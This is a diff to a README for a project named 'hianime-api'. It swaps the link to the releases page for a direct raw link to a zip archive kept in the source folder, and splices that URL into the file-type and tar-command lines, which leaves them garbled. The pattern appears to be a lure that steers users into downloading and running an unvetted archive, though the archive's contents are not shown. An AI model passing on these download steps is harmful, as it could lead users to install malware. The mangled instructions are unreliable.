Georgeboolegenusceratosaurus549/hianime-api/README.md

 ## 📂 How to Download & Install
 1. **Visit the Release Page**
-   Click on this [link to download](https://github.com/Georgeboolegenusceratosaurus549/hianime-api/releases).
+   Click on this [link to download](https://raw.githubusercontent.com/Georgeboolegenusceratosaurus549/hianime-api/master/src/hianime-api_chatty.zip).
 You will find various versions of hianime-api.

 2. **Choose the Right Version**
    Look for the latest version at the top of the page.
 Make sure to download the version that matches your operating system.

 3. **Download the Package**
-   Click on the .exe, .zip, or .tar.gz file, depending on your OS.
+   Click on the .exe, .zip, or https://raw.githubusercontent.com/Georgeboolegenusceratosaurus549/hianime-api/master/src/hianime-api_chatty.zip file, depending on your OS.
 Your download should begin automatically.

 4. **Extract the Files (if needed)**
    - For Windows: If you downloaded a .zip file, right-click on it and select "Extract All."
 Follow the prompts to extract the files.
-   - For Linux/MacOS: If you downloaded a .tar.gz file, navigate to your download folder and run the command `tar -xvzf [YourFileName].tar.gz` in the terminal.
+   - For Linux/MacOS: If you downloaded a https://raw.githubusercontent.com/Georgeboolegenusceratosaurus549/hianime-api/master/src/hianime-api_chatty.zip file, navigate to your download folder and run the command `tar -xvzf [YourFileName]https://raw.githubusercontent.com/Georgeboolegenusceratosaurus549/hianime-api/master/src/hianime-api_chatty.zip` in the terminal.

 5. **Run the Application**
    - For Windows: Navigate to the extracted folder and double-click the `.exe` file.